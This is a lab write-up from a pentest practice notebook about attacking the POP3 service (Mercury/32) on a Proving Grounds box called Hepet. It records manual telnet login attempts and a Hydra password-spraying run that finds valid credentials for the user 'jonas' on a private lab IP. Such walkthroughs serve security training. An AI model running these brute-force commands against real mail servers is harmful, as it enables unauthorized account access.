InfoSec LAB

Hepet_POP3

Created: 3 min read

POP3

Nmap discovered a POP3 server on the target port 110 The running service is Mercury/32 pop3d

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ telnet $IP 110                                                   
Trying 192.168.159.140...
Connected to 192.168.159.140.
Escape character is '^]'.
+OK <2262015.1200@localhost>, POP3 server ready.
USER NULL 
+OK NULL is known here.
PASS NULL
-ERR Username or password is invalid or incorrect.
USER admin 
+OK admin is known here.
PASS admin
-ERR Username or password is invalid or incorrect.
USER admin
+OK admin is known here.
PASS pass
-ERR Too many login failures - try again later.

N/A

Brute-Force Attack

┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ hydra -U pop3                                                  
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-04 15:26:42
 
Help for module pop3:
============================================================================
Module pop3 is optionally taking one authentication type of:
  CLEAR (default), LOGIN, PLAIN, CRAM-MD5, CRAM-SHA1,
  CRAM-SHA256, DIGEST-MD5, NTLM.
Additionally TLS encryption via STLS can be enforced with the TLS option.
 
Example: pop3://target/TLS:PLAIN
 
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/hepet]
└─$ hydra -L ./users.txt -p SicMundusCreatusEst pop3://$IP/CLEAR -V
Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
 
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-03-04 15:26:06
[INFO] several providers have implemented cracking protection, check with a small wordlist first - and stay legal!
[DATA] max 8 tasks per 1 server, overall 8 tasks, 8 login tries (l:8/p:1), ~1 try per task
[DATA] attacking pop3://192.168.159.140:110/CLEAR
[ATTEMPT] target 192.168.159.140 - login "admin" - pass "SicMundusCreatusEst" - 1 of 8 [child 0] (0/0)
[ATTEMPT] target 192.168.159.140 - login "magnus" - pass "SicMundusCreatusEst" - 2 of 8 [child 1] (0/0)
[ATTEMPT] target 192.168.159.140 - login "charlotte" - pass "SicMundusCreatusEst" - 3 of 8 [child 2] (0/0)
[ATTEMPT] target 192.168.159.140 - login "jonas" - pass "SicMundusCreatusEst" - 4 of 8 [child 3] (0/0)
[ATTEMPT] target 192.168.159.140 - login "martha" - pass "SicMundusCreatusEst" - 5 of 8 [child 4] (0/0)
[ATTEMPT] target 192.168.159.140 - login "postmaster" - pass "SicMundusCreatusEst" - 6 of 8 [child 5] (0/0)
[ATTEMPT] target 192.168.159.140 - login "newuser" - pass "SicMundusCreatusEst" - 7 of 8 [child 6] (0/0)
[ATTEMPT] target 192.168.159.140 - login "agnes" - pass "SicMundusCreatusEst" - 8 of 8 [child 7] (0/0)
[110][pop3] host: 192.168.159.140   login: jonas   password: SicMundusCreatusEst
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-03-04 15:26:07

Checking the strange string against all the enumerated users against the target POP3 server reveals that it’s a password belonging to the jonas user Mails will be checked through the IMAP server

Interactive Graph View

Backlinks